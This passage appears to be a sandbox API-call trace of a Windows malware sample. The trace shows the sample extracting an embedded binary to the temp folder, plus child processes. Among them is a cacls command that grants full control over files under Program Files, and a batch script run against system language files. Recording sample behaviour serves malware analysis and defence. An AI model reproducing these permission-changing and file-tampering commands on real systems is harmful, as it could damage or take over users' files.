!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.336] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0212.336] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0212.336] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹óo\x98äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0212.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x638250 [0212.948] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0212.948] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0212.949] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x638250) returned 0x80 [0212.950] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0212.950] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0212.950] GetCurrentProcess () returned 0xffffffff [0212.950] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0212.951] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0212.951] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0212.955] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0212.955] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0212.955] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0212.955] LockResource (hResData=0x43c648) returned 0x43c648 [0212.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x6382d8 [0212.957] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0213.221] GetLastError () returned 0x20 [0213.221] GetLastError () returned 0x20 [0213.221] SetLastError (dwErrCode=0x20) [0213.221] GetLastError () returned 0x20 [0213.222] SetLastError (dwErrCode=0x20) [0213.222] GetLastError () returned 0x20 [0213.222] SetLastError (dwErrCode=0x20) [0213.223] GetLastError () returned 0x20 [0213.223] SetLastError (dwErrCode=0x20) [0213.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x639820 [0213.224] GetLastError () returned 0x20 [0213.224] SetLastError (dwErrCode=0x20) [0213.224] GetLastError () returned 0x20 [0213.224] SetLastError (dwErrCode=0x20) [0213.224] GetLastError () returned 0x20 [0213.224] SetLastError (dwErrCode=0x20) [0213.224] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0213.225] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0214.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637820 | out: hHeap=0x620000) returned 1 [0214.051] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0214.051] ExitProcess (uExitCode=0x1) [0214.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6360c8 | out: hHeap=0x620000) returned 1 Process: id = "209" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x243c5000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x494" cmd_line = "cacls \"C:\\Program Files\\Windows Mail\\told.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 776 os_tid = 0x284 Process: id = "210" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ea50000" os_pid = "0xab8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 777 os_tid = 0xa38 [0218.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f93c | out: lpSystemTimeAsFileTime=0x16f93c*(dwLowDateTime=0x3a49cfc0, dwHighDateTime=0x1d68287)) [0218.516] GetCurrentProcessId () returned 0xab8 [0218.516] GetCurrentThreadId () returned 0xa38 [0218.516] GetTickCount () returned 0x11627cc [0218.516] QueryPerformanceCounter (in: lpPerformanceCount=0x16f934 | out: lpPerformanceCount=0x16f934*=33885462515) returned 1 [0218.518] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0218.518] __set_app_type (_Type=0x1) [0218.518] __p__fmode () returned 0x770331f4 [0218.518] __p__commode () returned 0x770331fc [0218.518] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0218.518] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0218.519] GetCurrentThreadId () returned 0xa38 [0218.519] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa38) returned 0x60 [0218.519] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0218.519] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0218.519] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.772] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8cc | out: phkResult=0x16f8cc*=0x0) returned 0x2 [0218.975] VirtualQuery (in: lpAddress=0x16f903, lpBuffer=0x16f89c, dwLength=0x1c | out: lpBuffer=0x16f89c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.975] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f89c, dwLength=0x1c | out: lpBuffer=0x16f89c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.975] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f89c, dwLength=0x1c | out: lpBuffer=0x16f89c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.975] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f89c, dwLength=0x1c | out: lpBuffer=0x16f89c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.976] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f89c, dwLength=0x1c | out: lpBuffer=0x16f89c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0218.976] GetConsoleOutputCP () returned 0x1b5 [0218.976] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0218.976] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0218.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.977] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0218.977] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.977] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0218.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.978] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.978] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.978] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0218.979] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.979] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0218.979] GetEnvironmentStringsW () returned 0x604068* [0218.980] GetProcessHeap () returned 0x5f0000 [0218.980] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xaca) returned 0x604b40 [0218.980] FreeEnvironmentStringsW (penv=0x604068) returned 1 [0218.980] GetProcessHeap () returned 0x5f0000 [0218.980] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4) returned 0x600d20 [0218.980] GetEnvironmentStringsW () returned 0x604068* [0218.981] GetProcessHeap () returned 0x5f0000 [0218.981] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xaca) returned 0x605618 [0218.981] FreeEnvironmentStringsW (penv=0x604068) returned 1 [0218.981] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e83c | out: phkResult=0x16e83c*=0x68) returned 0x0 [0218.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x0, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.981] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x1, lpcbData=0x16e840*=0x4) returned 0x0 [0218.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x1, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x0, lpcbData=0x16e840*=0x4) returned 0x0 [0218.981] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x40, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x40, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x40, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.982] RegCloseKey (hKey=0x68) returned 0x0 [0218.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e83c | out: phkResult=0x16e83c*=0x68) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x40, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x1, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x1, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x0, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x9, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x4, lpData=0x16e848*=0x9, lpcbData=0x16e840*=0x4) returned 0x0 [0218.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e844, lpData=0x16e848, lpcbData=0x16e840*=0x1000 | out: lpType=0x16e844*=0x0, lpData=0x16e848*=0x9, lpcbData=0x16e840*=0x1000) returned 0x2 [0218.982] RegCloseKey (hKey=0x68) returned 0x0 [0218.983] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2f4 [0218.983] srand (_Seed=0x5f51e2f4) [0218.983] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"\"" [0218.983] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"\"" [0218.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0218.984] GetProcessHeap () returned 0x5f0000 [0218.984] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x604068 [0218.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x604070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0218.985] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.985] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.985] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.985] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.985] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.985] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.985] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.985] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.985] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.985] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.985] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.986] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.986] GetProcessHeap () returned 0x5f0000 [0218.986] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604b40 | out: hHeap=0x5f0000) returned 1 [0218.986] GetEnvironmentStringsW () returned 0x604280* [0218.986] GetProcessHeap () returned 0x5f0000 [0218.986] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xae2) returned 0x606be0 [0218.986] FreeEnvironmentStringsW (penv=0x604280) returned 1 [0218.986] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.987] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.987] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.987] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0218.987] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.987] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.987] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.987] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.987] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.987] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.987] GetProcessHeap () returned 0x5f0000 [0218.987] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x54) returned 0x6076d0 [0218.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f608 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0218.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f608, lpFilePart=0x16f604 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f604*="Desktop") returned 0x25 [0218.987] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0218.987] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f384 | out: lpFindFileData=0x16f384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x603ee8 [0218.988] FindClose (in: hFindFile=0x603ee8 | out: hFindFile=0x603ee8) returned 1 [0218.988] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f384 | out: lpFindFileData=0x16f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x603ee8 [0218.988] FindClose (in: hFindFile=0x603ee8 | out: hFindFile=0x603ee8) returned 1 [0218.988] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0218.988] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f384 | out: lpFindFileData=0x16f384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, 